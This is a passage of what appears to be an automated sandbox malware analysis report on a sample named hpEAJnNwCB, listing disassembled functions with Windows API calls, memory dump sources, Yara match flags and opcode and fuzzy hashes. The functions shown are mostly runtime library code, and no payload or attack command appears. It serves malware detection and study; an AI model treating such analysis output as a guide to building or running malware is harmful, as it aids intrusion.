                                                                                                                                                                                                                                            Function 024C3AEA Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetConsoleCP.KERNEL32(?,024BC4A4,E0830C40,?,?,?,?,?,?,024C425F,0249E03C,024BC4A4,?,024BC4A4,024BC4A4,0249E03C), ref: 024C3B2C
                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 024C3BA7
                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 024C3BC2
                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,024BC4A4,00000001,?,00000005,00000000,00000000), ref: 024C3BE8
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,024C425F,00000000,?,?,?,?,?,?,?,?,?,024C425F,0249E03C), ref: 024C3C07
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,0249E03C,00000001,024C425F,00000000,?,?,?,?,?,?,?,?,?,024C425F,0249E03C), ref: 024C3C40
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1324828854-0
                                                                                                                                                                                                                                            • Opcode ID: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
                                                                                                                                                                                                                                            • Instruction ID: 62546ae6c4c06f584debaa7933d804e032d36d239a92dff931377c6f7ae1bd3e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8451D7759002099FDB10CFA9D884AEEBBF4EF09704F24815FE555E7291E7309681CF65
                                                                                                                                                                                                                                            Function 00433883 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 00433940
                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 0043395B
                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1324828854-0
                                                                                                                                                                                                                                            • Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
                                                                                                                                                                                                                                            • Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69
                                                                                                                                                                                                                                            Function 024B4AB4 Relevance: 10.6, APIs: 7, Instructions: 104threadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 024B4ACD
                                                                                                                                                                                                                                              • Part of subcall function 024B4D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,024B4800), ref: 024B4DAC
                                                                                                                                                                                                                                            • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 024B4AE2
                                                                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024B4AF1
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 024B4AFF
                                                                                                                                                                                                                                            • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 024B4B75
                                                                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024B4BB5
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 024B4BC3
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3151764488-0
                                                                                                                                                                                                                                            • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                            • Instruction ID: a628bbbd2d348ce29d9d0df7e48769a6e4244e10d226924f0f8b5281cf18a5be
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8831EA39A002149BCF06EF69C8A1BAE73B9FF45710F20456BD91597342DB70DE01DBA4
                                                                                                                                                                                                                                            Function 024CFBA8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                                                                                                                                                                            • Instruction ID: 0712ba03e109f8226f459bfa4cec96e6b59cc2fe8c8c847ce00823193b087448
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A511B739704115BBDB612F7ACC489AB7A6EEF82721B21061FFC16D7240DB348845DAB0
                                                                                                                                                                                                                                            Function 0043F941 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                                                                                                                                                            • Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669
                                                                                                                                                                                                                                            Function 024CA5EA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 024CA331: _free.LIBCMT ref: 024CA35A
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA638
                                                                                                                                                                                                                                              • Part of subcall function 024C36D1: HeapFree.KERNEL32(00000000,00000000,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?), ref: 024C36E7
                                                                                                                                                                                                                                              • Part of subcall function 024C36D1: GetLastError.KERNEL32(?,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?,?), ref: 024C36F9
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA643
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA64E
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA6A2
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA6AD
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA6B8
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA6C3
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                            • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                            • Instruction ID: d60e3b10f5a541f1e3c712431f81d847c3e58f04d546d41ca474a2eb30efb138
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B11B4B5605B18AADEB0BF77CC55FCF7B9EDF00700F50482EA299AA160D6A4B4114F40
                                                                                                                                                                                                                                            Function 0043A383 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043A3D1
                                                                                                                                                                                                                                              • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                              • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043A3DC
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043A3E7
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043A43B
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043A446
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043A451
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043A45C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                            • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                            • Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46
                                                                                                                                                                                                                                            Function 024A2659 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,024A0DA0,?,?,?,00000000), ref: 024A2667
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024A0DA0,?,?,?,00000000), ref: 024A266D
                                                                                                                                                                                                                                            • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,024A0DA0,?,?,?,00000000), ref: 024A269A
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024A0DA0,?,?,?,00000000), ref: 024A26A4
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024A0DA0,?,?,?,00000000), ref: 024A26B6
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A26CC
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 024A26DA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4227777306-0
                                                                                                                                                                                                                                            • Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                                                                                                                                                                                                            • Instruction ID: 0e8d175086ac41bcc4a545e07c95b9ab4c1cc92e552ad1b8c15ade6ff792488d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A01A735502115A7D720FF6AEC58FAF376CAF52F52B50042BF805D2160EBA4D9449AB8
                                                                                                                                                                                                                                            Function 004123F2 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412400
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412406
                                                                                                                                                                                                                                            • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412433
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041243D
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041244F
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00412473
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4227777306-0
                                                                                                                                                                                                                                            • Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                                                                                                                                                                                                            • Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D
                                                                                                                                                                                                                                            Function 024A24A4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46libraryloaderCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,024A670B), ref: 024A24B6
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024A24C4
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024A24D2
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,024A670B), ref: 024A2500
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 024A2507
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,024A670B), ref: 024A2522
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,024A670B), ref: 024A252E
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A2544
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 024A2552
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                            • String ID: kernel32.dll
                                                                                                                                                                                                                                            • API String ID: 4179531150-1793498882
                                                                                                                                                                                                                                            • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                                                                                                                                                            • Instruction ID: 5f1891afa62f468227035c915ee513812fc5e4264239869d0fd027f1f7355b9f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9FF0F9759003103FF7117B757D6981B3FACDD5AA23320023BF802E2291EBB5C5019658
                                                                                                                                                                                                                                            Function 0040C618 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 37COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C677
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Exception@8Throw
                                                                                                                                                                                                                                            • String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                            • API String ID: 2005118841-3619870194
                                                                                                                                                                                                                                            • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                            • Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C
                                                                                                                                                                                                                                            Function 00430EC2 Relevance: 9.3, APIs: 6, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                            • _memcmp.LIBVCRUNTIME ref: 0043116C
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004311DD
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004311F6
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00431228
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00431231
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043123D
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorLast$_memcmp
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4275183328-0
                                                                                                                                                                                                                                            • Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                                                                                                                                                                                                            • Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44
                                                                                                                                                                                                                                            Function 024C239B Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,024C25EC,00000001,00000001,?), ref: 024C23F5
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,024C25EC,00000001,00000001,?,?,?,?), ref: 024C247B
                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 024C2575
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 024C2582
                                                                                                                                                                                                                                              • Part of subcall function 024C390E: RtlAllocateHeap.NTDLL(00000000,0249DAD7,00000000), ref: 024C3940
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 024C258B
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 024C25B0
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1414292761-0
                                                                                                                                                                                                                                            • Opcode ID: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
                                                                                                                                                                                                                                            • Instruction ID: 4fec622c4c30e76500a84d4467b0b69da0c4c77b5589304af15b26128b3279da
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E51E076A00216ABDB25CF68CC60EBF77AAEB44654F254A2EFC04D6250DBF4DD41CA60
                                                                                                                                                                                                                                            Function 024BE419 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __cftoe
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4189289331-0
                                                                                                                                                                                                                                            • Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                                                                                                                                                                            • Instruction ID: 897b4212b920e9473e79831338d45d68ce6dfad61efd5791283137d9a4fd4607
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6751EB36A00205ABDF269FA9CC40BEF77A9EF88334F90425FF815D6281EB71D5518A74
                                                                                                                                                                                                                                            Function 024B302B Relevance: 9.1, APIs: 6, Instructions: 106COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 024B3051
                                                                                                                                                                                                                                              • Part of subcall function 024A8AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 024A8ABD
                                                                                                                                                                                                                                            • SafeSQueue.LIBCONCRT ref: 024B306A
                                                                                                                                                                                                                                            • Concurrency::location::_Assign.LIBCMT ref: 024B312A
                                                                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024B314B
